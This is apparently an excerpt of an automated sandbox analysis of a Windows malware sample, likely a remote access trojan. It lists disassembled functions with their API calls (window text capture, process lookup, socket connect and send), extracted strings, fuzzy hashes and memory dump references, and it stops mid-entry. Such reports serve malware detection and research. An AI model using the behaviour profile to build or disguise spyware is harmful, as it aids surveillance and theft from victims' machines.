                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: pth_unenc$BG
                              • API String ID: 1818849710-2233081382
                              • Opcode ID: 33291842164d3cd534f50c8358874d6d17caaa1fe138597c3d3bb1c43a6161c1
                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                              • Opcode Fuzzy Hash: 33291842164d3cd534f50c8358874d6d17caaa1fe138597c3d3bb1c43a6161c1
                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                              Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                              • String ID: KeepAlive | Disabled
                              • API String ID: 2993684571-305739064
                              • Opcode ID: 6a2e9fed7c31a08c387878a041e76ce1f8cb1591724bfece31842f89ecd98ae4
                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                              • Opcode Fuzzy Hash: 6a2e9fed7c31a08c387878a041e76ce1f8cb1591724bfece31842f89ecd98ae4
                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                              Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                              Strings
                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                              • API String ID: 3024135584-2418719853
                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                              Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                              • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                              Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                              • String ID:
                              • API String ID: 3525466593-0
                              • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                              • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                              Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                              Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                              • __freea.LIBCMT ref: 0044FFC4
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                              • String ID:
                              • API String ID: 313313983-0
                              • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                              • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                              Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                              Download Yara Rule
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                              • _free.LIBCMT ref: 0044E1A0
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                              • String ID:
                              • API String ID: 336800556-0
                              • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                              • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                              Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                              • _free.LIBCMT ref: 00446F7D
                              • _free.LIBCMT ref: 00446FA4
                              • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                              • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free
                              • String ID:
                              • API String ID: 3170660625-0
                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                              Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseHandleOpen$FileImageName
                              • String ID:
                              • API String ID: 2951400881-0
                              • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                              • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                              Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 0044F7B5
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 0044F7C7
                              • _free.LIBCMT ref: 0044F7D9
                              • _free.LIBCMT ref: 0044F7EB
                              • _free.LIBCMT ref: 0044F7FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                              Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 00443305
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 00443317
                              • _free.LIBCMT ref: 0044332A
                              • _free.LIBCMT ref: 0044333B
                              • _free.LIBCMT ref: 0044334C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                              Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                              • IsWindowVisible.USER32(?), ref: 004167A1
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessWindow$Open$TextThreadVisible
                              • String ID: (FG
                              • API String ID: 3142014140-2273637114
                              • Opcode ID: f1ec84a98d434292b3bb184935321379dc8f8878a94d9c86ba59561147998443
                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                              • Opcode Fuzzy Hash: f1ec84a98d434292b3bb184935321379dc8f8878a94d9c86ba59561147998443
                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                              Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              • _strpbrk.LIBCMT ref: 0044D4A8
                              • _free.LIBCMT ref: 0044D5C5
                                • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00434403,?,?,?,00434403,00000016,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,?,00434403), ref: 0043A878
                                • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000,?,00434403), ref: 0043A87F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                              • String ID: *?$.
                              • API String ID: 2812119850-3972193922
                              • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                              • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                              • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                              • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                              Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                              • String ID: XCG$x~^$>G
                              • API String ID: 2334542088-886960946
                              • Opcode ID: 117f3a8dcb765dec107e638207eed2dfcae5ace0fe68797d76a2064f9764c662
